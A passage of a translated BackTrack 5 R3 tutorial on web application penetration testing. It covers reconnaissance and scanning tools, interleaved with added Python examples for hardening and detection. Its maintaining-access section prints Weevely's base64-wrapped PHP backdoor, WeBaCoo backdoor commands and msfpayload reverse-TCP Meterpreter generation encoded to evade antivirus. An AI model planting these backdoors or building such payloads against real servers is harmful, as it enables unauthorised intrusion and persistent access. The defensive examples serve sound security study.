• WHATWEB: Another tool used to identify the type of content management system (CMS), blogging platform, statistics packages, JavaScript libraries and servers in use. It has over 900 plugins for web analysis purposes.

Use:
  /pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/
  /pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/
  /pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/
  /pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24

4. IDS/IPS DETECTION

While performing a VA/PT on a domain, IDS/IPS services may be installed, and these can sometimes stop several types of attacks made against the domain. Many WAFs (Web Application Firewalls) are sold to companies as a successful technique for mitigating vulnerabilities in web applications. Luckily, a WAF is easy to detect, because most of them use signature-based detection methods; the attacker can therefore try to encode parameters and attempt to bypass the WAF. The BackTrack suite includes a useful tool for detecting IDS/IPS: Waffit.

• WAFFIT: A tool that detects the firewall a web server may be behind. It is by no means of little use, since detecting the firewall in front of the domain is a very important step in the penetration testing process.

Use:
  /pentest/web/waffit# ./wafw00f.py http://sitio-web.com/
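The fingerprinting that BlindElephant, CMS-Explorer and WhatWeb perform (and that wafw00f applies to WAF response headers) comes down to matching response headers and HTML against signatures. The following Python script is an added example and is not part of the original document or of any of those tools: it runs a few signatures over constructed HTTP responses (the generator meta tags are the well-known WordPress and Joomla! defaults; the header values are made up) and shows that a server which strips version banners and the generator tag returns no matches, which is the defender's side of this step.

```python
import re
from typing import Dict, Optional

# Constructed HTTP responses standing in for what a fingerprinting tool
# receives. The generator meta tags are the well-known WordPress and Joomla!
# defaults; the header values are made up for the example.
RESPONSES: Dict[str, Dict] = {
    "wordpress_default": {
        "headers": {"Server": "Apache/2.4.41 (Ubuntu)", "X-Powered-By": "PHP/7.4.3"},
        "body": '<html><head><meta name="generator" content="WordPress 6.1" />'
                '<link rel="stylesheet" href="/wp-content/themes/x/style.css"></head></html>',
    },
    "joomla_default": {
        "headers": {"Server": "nginx"},
        "body": '<meta name="generator" content="Joomla! - Open Source Content Management" />',
    },
    "hardened": {
        # generator tag removed, Server banner reduced, X-Powered-By suppressed
        "headers": {"Server": "web"},
        "body": '<html><head><link rel="stylesheet" href="/assets/site.css"></head></html>',
    },
}

# (technology, where to look, pattern); capture group 1, when present, is the version.
SIGNATURES = [
    ("WordPress", "body", re.compile(r'<meta name="generator" content="WordPress ?([\d.]*)"', re.I)),
    ("WordPress", "body", re.compile(r"/wp-content/", re.I)),
    ("Joomla!", "body", re.compile(r'<meta name="generator" content="Joomla!', re.I)),
    ("PHP", "header:X-Powered-By", re.compile(r"PHP/([\d.]+)")),
    ("Apache", "header:Server", re.compile(r"Apache/([\d.]+)")),
]


def fingerprint(response: Dict) -> Dict[str, Optional[str]]:
    """Return {technology: version or None} for every signature that matches."""
    found: Dict[str, Optional[str]] = {}
    for label, where, pattern in SIGNATURES:
        if where == "body":
            haystack = response["body"]
        else:
            haystack = response["headers"].get(where.split(":", 1)[1], "")
        m = pattern.search(haystack)
        if not m:
            continue
        version = m.group(1) if m.groups() and m.group(1) else None
        # Prefer a signature that yields a version over one that only names the product.
        if label not in found or (version and not found[label]):
            found[label] = version
    return found


def leaked_versions(response: Dict) -> Dict[str, str]:
    """The subset of findings that disclose an exact version: what to remove first."""
    return {k: v for k, v in fingerprint(response).items() if v}


if __name__ == "__main__":
    for name, resp in RESPONSES.items():
        print(f"{name:18} -> {fingerprint(resp)}")
```

On the server side the corresponding hardening is to drop the generator meta tag from templates and to stop advertising versions in headers (for Apache, ServerTokens Prod; for PHP, expose_php = Off); the "hardened" response above models that state. Path-based signatures such as /wp-content/ survive these changes, so hardening hides versions rather than the product itself.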
5. OPEN SOURCE ANALYSIS

Open-source analysis is performed using tools like GHDB, revhosts and XSSed. GHDB (Google Hacking Database) and XSSed are websites, while revhosts is a console tool.

• GHDB: Google Hacking Database. The exploit-db team maintains a database of Google dorks that can greatly help a pen-tester's information gathering. We can use the dorks to find certain types of vulnerable servers or other information. For example, a Google dork like "Microsoft-IIS/6.0" intitle:index.of can be used to detect servers running Microsoft IIS 6.0.

• XSSED: http://www.xssed.com/ is a website that contains a list of websites vulnerable to Cross Site Scripting (XSS), submitted by various authors. It can be opened from: Applications - Backtrack - Information Gathering - Web Application Analysis - Open Source Analysis - Xssed.

6. WEB CRAWLERS

In this last category of web analysis the well-known crawlers are used; they help a great deal in listing the "hidden" files and folders inside a web server. The BackTrack suite has many tools for this type of analysis, such as DIRB, Golismero, SQLScan, Deblaze and WebShag.

• WEBSHAG: Webshag is a tool written in Python that combines the features useful for auditing web servers: web crawling, URL scanning and file fuzzing. Webshag can be used to analyse a web server over HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest).
It also offers innovative IDS evasion features intended to make correlation between requests harder (for example, using a randomly chosen proxy server for each HTTP request). It can be opened from: Applications - BackTrack - Information Gathering - Web Application Analysis - Web Crawlers - WebShag Gui.

• DIRBUSTER: DirBuster is a Java application designed to brute-force directory and file names on a web server/application. It is often the case today that what looks like a web server in a default installation state is actually not, and has pages and applications hidden within it; DirBuster tries to find these. DirBuster comes with a total of 9 different word lists, which makes it extremely effective at finding hidden files and directories. And if that was not enough, DirBuster also has the option of performing pure brute force.

It can be found at: Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Application Fuzzers - DirBuster
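What DirBuster leaves behind on the server side is a burst of 404 responses for distinct paths from one client. The following Python script is an added example, not from the original document or from DirBuster: it parses constructed Apache combined-format log lines (the user-agent strings and addresses are made up) and flags any client that requests five or more distinct non-existent paths within a ten-second window, so the same activity can be spotted from the defender's side.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed access log lines (Apache combined format): one client probing
# for directories that do not exist, one ordinary visitor with a single 404.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /admin/ HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /backup/ HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
203.0.113.7 - - [10/Oct/2012:13:55:37 +0000] "GET /old/ HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
203.0.113.7 - - [10/Oct/2012:13:55:37 +0000] "GET /test/ HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
203.0.113.7 - - [10/Oct/2012:13:55:38 +0000] "GET /images/ HTTP/1.1" 200 1043 "-" "DirBuster-1.0-RC1"
203.0.113.7 - - [10/Oct/2012:13:55:38 +0000] "GET /.svn/ HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
198.51.100.22 - - [10/Oct/2012:13:55:40 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.22 - - [10/Oct/2012:13:55:41 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_log(text: str) -> List[dict]:
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
        ev["status"] = int(ev["status"])
        events.append(ev)
    return events


def detect_dir_bruteforce(events: List[dict], threshold: int = 5,
                          window: timedelta = timedelta(seconds=10)) -> Dict[str, int]:
    """Return {client_ip: max distinct 404 paths seen inside one window} for clients
    that reach the threshold. Counting distinct paths means a browser retrying one
    missing resource is not flagged; a word-list scan requests many different ones."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for ev in events:
        if ev["status"] == 404:
            by_ip[ev["ip"]].append(ev)
    flagged: Dict[str, int] = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:   # slide the window
                start += 1
            paths = {e["path"] for e in evs[start:end + 1]}
            if len(paths) >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(paths))
    return flagged


if __name__ == "__main__":
    print(detect_dir_bruteforce(parse_log(SAMPLE_LOG)))
```

The threshold and window are tuning knobs: a busy site with many broken links needs a higher threshold, and a scanner run slowly to stay under a rate limit needs a longer window. Pairing the 404 count with a constant user-agent from the same client, as in the sample, makes the signal much stronger.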
7. VULNERABILITY ASSESSMENT AND EXPLOITATION

The vulnerability assessment stage is where we probe our target for flaws, but before a vulnerability assessment, gathering information about the target is much more useful. The information gathering phase remains the key step before any further attack, simply because it makes the job easier: for example, in the earlier stage, CMS identification scanners such as BlindElephant found the version of the installed application. Now, at the vulnerability assessment stage, we can use many tools (scanners) that will help a lot in finding vulnerabilities in the specific web server.

• JOOMSCAN: A Perl-based tool used to identify known vulnerabilities such as SQL injection, XSS and others on web servers based on the Joomla platform.
  • Detects the version of Joomla! that is running.
  • Scans for and locates known vulnerabilities in Joomla! and its extensions.
  • Reports in text or HTML format.
  • Allows immediate updating via the scanner or svn.
  • Detects vulnerability types: SQL injection, LFI, RFI, XSS and others.

It can be opened from:
  /pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com

• SQLMAP: A tool that helps automate the process of detecting and exploiting SQL injection vulnerabilities, allowing full access to the database behind the web server.

It can be opened from:
  /pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
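The flaw that sqlmap automates against is easiest to understand in code. The following Python example is added here and is not from the original document or from sqlmap: a constructed SQLite article table is queried twice, once with the request value pasted into the SQL text and once with a bound parameter. The classic input ' OR '1'='1 returns the unpublished row only from the vulnerable version, and a legitimate apostrophe (O'Brien) breaks only the vulnerable version, which is why the two implementations can be told apart from outside.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory article table; stands in for a CMS database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO articles (id, title, published) VALUES (?, ?, ?)",
        [(1, "Public post", 1), (2, "Unpublished draft", 0), (3, "Another public post", 1)],
    )
    return conn


def find_article_vulnerable(conn: sqlite3.Connection, title: str) -> List[Tuple]:
    # Vulnerable: the request value is pasted into the SQL text, so quotes in it
    # change the statement. This is the pattern sqlmap detects and exploits.
    sql = f"SELECT id, title FROM articles WHERE published = 1 AND title = '{title}'"
    return conn.execute(sql).fetchall()


def find_article_safe(conn: sqlite3.Connection, title: str) -> List[Tuple]:
    # Hardened: the value is bound as a parameter and is never parsed as SQL.
    sql = "SELECT id, title FROM articles WHERE published = 1 AND title = ?"
    return conn.execute(sql, (title,)).fetchall()


def behaves_differently(conn: sqlite3.Connection, title: str) -> bool:
    """True when the two implementations disagree for this input (different rows,
    or a syntax error from the vulnerable one), i.e. when the input was
    interpreted as SQL rather than as data."""
    try:
        vulnerable = find_article_vulnerable(conn, title)
    except sqlite3.Error:
        return True
    return vulnerable != find_article_safe(conn, title)


if __name__ == "__main__":
    db = make_db()
    for value in ["Public post", "x' OR '1'='1", "O'Brien"]:
        print(repr(value), "->", "differs" if behaves_differently(db, value) else "same")
```

The ' OR '1'='1 case is what the --dbs step in the text builds on: once the WHERE clause can be rewritten, the same channel can be used to pull other tables. Parameter binding closes it regardless of the database engine; escaping quotes by hand does not, because numeric and identifier contexts are not protected by quote escaping.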
• FIMAP: A small tool written in Python that can find, prepare, audit and automatically exploit Remote File Inclusion bugs in web applications. It is currently under development, but usable. The objective of Fimap is to improve the quality and security of your website.

It can be opened from:
  /pentest/web/fimap# ./fimap.py -u 'http://localhost/test.php?file=bang&id=23'
  /pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='
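The file inclusion bugs Fimap looks for arise when a request parameter such as file= chooses the file the application includes. The following Python example is added here and is not from the original document or from Fimap; the page directory and page names are assumptions. It shows the two standard fixes: an allowlist of page tokens, and, where that is impractical, refusing URL schemes and embedded NULs and confining the resolved path to the include directory.

```python
import posixpath
from typing import Optional
from urllib.parse import urlparse

# Assumed layout for the example (hypothetical): page fragments live under
# PAGES_DIR and only the names in ALLOWED_PAGES may be included.
PAGES_DIR = "/var/www/site/pages"
ALLOWED_PAGES = {"home", "news", "contact"}


def resolve_allowlist(name: str) -> Optional[str]:
    """Preferred fix: the parameter is a token looked up in a fixed set; the
    application, not the request, decides which file that token maps to."""
    if name in ALLOWED_PAGES:
        return posixpath.join(PAGES_DIR, name + ".php")
    return None


def resolve_confined(file_param: str) -> Optional[str]:
    """Fallback when an allowlist is impractical: reject URL schemes and embedded
    NULs, normalise the path, and require it to stay inside PAGES_DIR."""
    if "\x00" in file_param or urlparse(file_param).scheme:
        return None                      # http://, ftp://, php://, data: ...
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, file_param))
    if posixpath.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None                      # left the directory via .. or an absolute path
    return candidate


if __name__ == "__main__":
    # Constructed inputs: one legitimate, the rest the shapes an inclusion scanner sends.
    for value in ["news.php", "sub/../news.php", "../../../etc/passwd",
                  "/etc/passwd", "http://203.0.113.5/shell.txt", "news.php\x00.jpg"]:
        print(repr(value), "->", resolve_confined(value))
```

The confinement check relies on posixpath.join replacing the base when the parameter is absolute and on normpath collapsing "..", so the final commonpath comparison is the only decision that matters; the scheme check is what turns a remote inclusion into a local-only problem.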
• SHODAN: Another site evaluation tool, particularly useful for pentesters. It can be used to collect intelligence about devices that are connected to the Internet. We can, for example, look to see whether network devices such as routers, VoIP equipment, printers, cameras, etc., are exposed.

To find out whether a service is running on the domain, the syntax would be:
  hostname:target.com port:80,21,22

If we simply want the results for the host name, the syntax would be:
  hostname:target.com

• W3AF: An auditing tool for web application security, basically divided into several modules such as Attack, Audit, Exploit, Discovery, Brute Force and Evasion, each of which can be used as needed. These modules come with several sub-modules; for example, we can select the XSS module under Audit when that particular check is required.

It can be opened from: Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - w3af

Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in the specified website, which can then be used for further exploitation.
• UNISCAN: A web vulnerability scanner oriented to computer security, aimed at finding vulnerabilities in web systems. It is licensed under the GNU General Public License 3.0 (GPL 3). Uniscan is developed in Perl, handles regular expressions easily and is also multi-threaded.

Features:
  • Identification of system pages via a web crawler.
  • Testing of pages found via the GET method.
  • Testing of forms found via the POST method.
  • Support for SSL requests (HTTPS).
  • Proxy support.
  • Generate a list of sites via Google.
  • Generate a list of sites via Bing.
  • GUI client written with Perl Tk.

It can be downloaded from: http://uniscan.sourceforge.net/?page_id=7

It can be opened from:
  ./uniscan.pl -u http://www.sitio-web.com/ -qweds

• NIKTO: A web server scanner that performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version-specific problems on over 270 servers. It also checks server configuration items such as the presence of multiple index files and HTTP server options. Nikto is a robust project that has been in development for several years and is constantly evolving. Some of its most interesting features include the ability to generate reports in various formats, integration with LibWhisker (anti-IDS), and integration with Metasploit, among others.

It can be opened from: Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Nikto

Use:
  /pentest/web/nikto# ./nikto.pl -host www.sitio-web.com

8. MAINTAINING ACCESS

Once we have access to the target website, we need to maintain that access for future use, so that we do not have to start from scratch again and again. To do this, we can upload web shells or backdoors to the web page. The encoding of the backdoor is also important, so as not to create "noise" when it is loaded on the server; otherwise administrators can easily detect and remove the backdoor. The BackTrack 5 R3 suite incorporates good tools for this process:

• WEEVELY: An essential tool for the post-exploitation of web applications, which can be used as a backdoor or web shell to manage web accounts. Weevely searches for functions such as system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system() and python_eval() that are enabled on the remote server. The following is an example of the backdoor code created by Weevely:
-------------------------------------------------------------------------------------------------------------------
eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZvc2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luKGFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30='));
-------------------------------------------------------------------------------------------------------------------

It can be opened from: Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely

Use:
  /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php
  /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password

• WEBACOO: WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP between the client and the web server. It is a post-exploitation tool to maintain access to a (compromised) web server. It was designed to operate under the radar of modern, up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealthy mechanism for executing commands on the compromised server. The obfuscated file communicates via the HTTP Cookie header, validating the HTTP requests and responses from the web server. WeBaCoo provides a way to generate the PHP backdoor code using predefined payloads. It also offers a "terminal" mode in which the user can establish a remote connection to the server and execute commands with the privileges of the web service.

The download is available from GitHub: https://github.com/anestisb/WeBaCoo

Options:
  1) Create the obfuscated backdoor 'backdoor.php' with default settings:
     ./webacoo.pl -g -o backdoor.php
  2) Create the un-obfuscated backdoor 'raw-backdoor.php' using the "transit" function:
     ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
  3) Establish a "terminal" connection to the remote host using the default settings:
     ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
  4) Establish a "terminal" connection to the remote host, configuring some arguments:
     ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TTT"
  5) Establish a "terminal" connection to the remote host via an HTTP proxy:
     ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
  6) Establish a "terminal" connection to the remote host via an HTTP proxy with basic authentication:
     ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
  7) Establish a "terminal" connection to the remote host via Tor and log the activity:
     ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

• MSFPAYLOAD: Metasploit can be used to create backdoors that can then be used to maintain access to the web server. This is done with the help of msfpayload. The steps to create a backdoor with msfpayload are as follows.

We have to select the payload we will use to get a Meterpreter shell over a reverse TCP connection. The command would be:
  msfpayload windows/meterpreter/reverse_tcp

This payload has two parameters: LHOST (our IP) and LPORT, to select the port we will use. The "R" selects RAW output format so that we can encode the output afterwards:
  msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R

This command creates the payload, but it has to be encoded to avoid antivirus detection; for that we can use msfencode, piping ("|") the raw output into it:
  msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t exe >> bucker.exe

-e specifies the encoder to use (in this case I am using shikata_ga_nai) and -t the output file type (exe). For example, if we want to see the list of available MSF encoders, we use the following command:
  msfpayload windows/meterpreter/reverse_tcp -l
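The Weevely backdoor quoted above is an eval(base64_decode(...)) wrapper, and both Weevely and WeBaCoo depend on PHP execution functions such as system() and passthru() being available on the server. The following Python script is an added example, not from the original document or from either tool: it scans constructed PHP sources for those functions, decodes literal base64 arguments to eval() so their content can be read, notes when an execution function is fed from request superglobals, and ranks the files for review. The sample base64 string decodes to a harmless echo statement.

```python
import base64
import binascii
import re
from typing import Dict, List

# PHP execution primitives; the list is the one the text says Weevely probes for.
EXEC_FUNCS = ("system", "passthru", "popen", "exec", "proc_open",
              "shell_exec", "pcntl_exec", "eval")
EXEC_RE = re.compile(r"\b(" + "|".join(map(re.escape, EXEC_FUNCS)) + r")\s*\(", re.I)
# eval() whose argument is base64_decode() of a string literal
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]", re.I)
# superglobals that carry request-controlled input
INPUT_RE = re.compile(r"\$_(GET|POST|COOKIE|REQUEST|SERVER\['HTTP_[A-Z_]+'\])")

# Constructed PHP files: a normal page, an eval/base64 wrapper whose payload is
# just  echo 'hello';  and a script that runs a command built from a cookie.
SAMPLES: Dict[str, str] = {
    "index.php": "<?php\n$title = htmlspecialchars($_GET['t'] ?? '');\necho \"<h1>$title</h1>\";\n",
    "cache_7f3a.php": "<?php eval(base64_decode('ZWNobyAnaGVsbG8nOw==')); ?>",
    "cron.php": "<?php\n$out = shell_exec('ls ' . $_COOKIE['d']);\necho $out;\n",
}


def scan_php(source: str) -> Dict[str, object]:
    """Return a score, the reasons behind it, and any decoded eval() payloads."""
    findings: List[str] = []
    decoded: List[str] = []
    for m in EVAL_B64_RE.finditer(source):
        blob = re.sub(r"\s", "", m.group(1))          # tolerate wrapped lines
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            text = "<undecodable>"
        decoded.append(text)
        findings.append("eval(base64_decode(...)) with a literal payload")
    funcs = sorted({f.lower() for f in EXEC_RE.findall(source)} - {"eval"})
    if funcs:
        findings.append("command execution: " + ", ".join(funcs))
        if INPUT_RE.search(source):
            findings.append("execution function in a file that reads request input")
    return {"score": len(findings), "findings": findings, "decoded": decoded}


def triage(files: Dict[str, str]) -> List[str]:
    """File names worth a look, highest score first; clean files are omitted."""
    scored = [(scan_php(src)["score"], name) for name, src in files.items()]
    return [name for score, name in sorted(scored, reverse=True) if score > 0]


if __name__ == "__main__":
    for name in triage(SAMPLES):
        result = scan_php(SAMPLES[name])
        print(name, result["findings"], result["decoded"])
```

Decoding the literal is what makes the output actionable: the reviewer sees the plaintext PHP instead of a base64 blob and can decide immediately whether it belongs. Running such a scan over the web root on a schedule and diffing the results against a known-good inventory is the practical counterpart to the "maintaining access" step described above.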
9. CONCLUSION

These are only a few of the methods you can follow to exploit vulnerabilities in a web application. Once we have the information about our target, we try to perform a vulnerability assessment in order to find out which exploits can be used. Once that is done, we exploit the vulnerabilities and, if necessary, upload a backdoor, but before that, the backdoor must be encoded to avoid detection. I hope this helps you with finding vulnerabilities, exploitation, and maintaining access to your target.

My greetings.

References:
  http://en.wikipedia.org/wiki/Penetration_test
  http://www.giac.org/certification/web-application-penetration-tester-gwapt
  http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/
  https://www.owasp.org/index.php/Web_Application_Penetration_Testing